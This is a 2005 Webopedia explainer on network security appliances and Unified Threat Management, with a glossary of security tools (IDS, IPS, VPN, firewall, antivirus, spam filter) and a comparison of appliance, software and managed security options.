Often used by organizations to ease remote management and to cut costs, a network server appliance is a typically inexpensive personal computer (sometimes called a thin client) that enables Internet access and some business-related activities. Applications used on network appliances typically are housed on a Web server accessed by the appliance. Network appliances lack many of the features of a fully equipped PC, and are often referred to as "closed box systems"  as they provide a complete solution consisting of limited hardware and software that is needed to perform a single or specialized set of functions. This hardware device allows for quick installation, ease-of-use, low maintenance and is typically managed through a Web browser. Increasingly, we're seeing appliances used in network security to replace more traditional software-based security solutions.

Popular with business and enterprise, Unified Threat Management (UTM) is a category of security appliances that integrates a range of security features into a single appliance. UTM appliances combine firewall, gateway anti-virus, and intrusion detection system (IDS) or intrusion preventioncapabilities into a single platform. UTM is designed protect users from blended threats while reducing complexity. UTM appliances offer a way to manage multiple appliances from a single location, create and manage global security policies, provide real-time monitoring and logging, as well as provide a single interface to manage security. Its basically the evolution of traditional firewall and VPN (virtual private network) solutions that incorporates many additional products and services.

Network security appliances generally consist of a set of network management and security tools that are installed on-site. Many network security appliances will also provide organizations with secure VPN for remote access.

Terms to Know: Security Tools

(IPS) intrusion prevention system: An IPS, or intrusion prevention system is used in computer security. It provides policies and rules for network traffic along with an intrusion detection system for alerting system or network administrators to suspicious traffic, but allows the administrator to provide the action upon being alerted. Some compare an IPS to a combination of IDS and an application layer firewall for protection.

(IDS) intrusion detection system: An intrusion detection system (IDS) inspects all inbound and outbound network activity and identifies suspicious patterns that may indicate a network or system attack from someone attempting to break into or compromise a system. An IDS evaluates a suspected intrusion once it has taken place and signals an alarm. An IDS also watches for attacks that originate from within a system.

(VPN) virtual private network: A network that is constructed by using public wires to connect nodes. For example, there are a number of systems that enable you to create networks using the Internet as the medium for transporting data. These systems use encryption and other security mechanisms to ensure that only authorized users can access the network and that the data cannot be intercepted.

firewall: A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

antivirus scanning: A utility that searches a hard disk for viruses and removes any that are found. Most antivirus include an auto-update feature that enables the program to download profiles of new viruses so that it can check for the new viruses as soon as they are discovered.

content/spam filter: A pattern through which data is passed. Only data that matches the pattern is allowed to pass through the filter. In this case the filters would block based on a list of Web sites, blocking illegal, objectionable or non-business-related content

Common Network Security Options
Many of the antivirus and security functions integrated into appliances can also be incorporated into your network via software. Over traditional software solutions, appliances offer many benefits including the following: it's easier to configure and manage, offers better integrity (it's harder to get through an appliance compared to a basic computer running security software), and features better overall performance r. When choosing a software solution, you also need to consider additional products and hardware (operating system, server hardware, storage servers) and also provide maintenance, and set-up configuration for the solution including deployment, upgrades and monitoring. The additional hardware requirements and configuration and maintenance costs are reduced or removed with appliances.

In addition to choosing between software-based security and appliances, organizations can also look at what is traditionally called managed (or hosted) security options. Rather than pay out the money to own the appliance or server hardware and software, managed security is a subscription service model, where you essentially pay per service on an ongoing basis. Managed security is a more popular choice with small to midsized businesses as the bulk of your security requirements are shifted to a third-party, outside of your own company, leaving security concerns to someone else. While that may sound risky, obviously you need to spend some time finding the right vendor with the right options to suite your network security needs.

 

---

More Related Terms From Webopedia
access control antivirus program authentication false acceptance	false rejection firewall intrusion detection system intrusion prevention system	intrusion signature secure server Unified Threat Management  worm
Webopedia: Networks > Security

---

Vangie 'Aurora' Beal - Writer, www.Webopedia.com
Last updated: July 28, 2005
 

eSecurity Planet  
A resource for daily information on e-security targeted to IT managers. The site provides users with information from a variety of sources, including experts at security product and services firms, and the consultants who follow the security industry.

One-Stop Network Security: Considering the Options  
Setting up and maintaining a reliable defense around your network takes hardware, software, diligence and a good measure of security expertise. That's a tall order for a small business. But that's exactly what it takes to track constantly evolving threats, to monitor network activity and to maintain the collection of tools required to combat attacks.

Secure Software Begins in the Development Process
Though there are many risk mitigation options for the software management lifecycle (firewalls, intrusion detection/prevention systems, etc.) these don’t address the root cause of the problem—a software development lifecycle (SDLC) that is not integrating security at each phase.

SOA Versus the Appliance
The appliances style of architecture seems to be at odds with the SOA architecture. Appliances are autonomous and tightly coupled software stacks, while SOA promotes distributed, loosely coupled software services.

Appliance vs. Software Comparison (PDF)
A frequently asked question in the tech industry is whether one should favor appliancebased solutions or software-based solutions. This is an entirely valid question as products in the same category often take these two different approaches. It is vital for
companies to understand the differences in cost, performance, security, installation, maintenance and support for these approaches.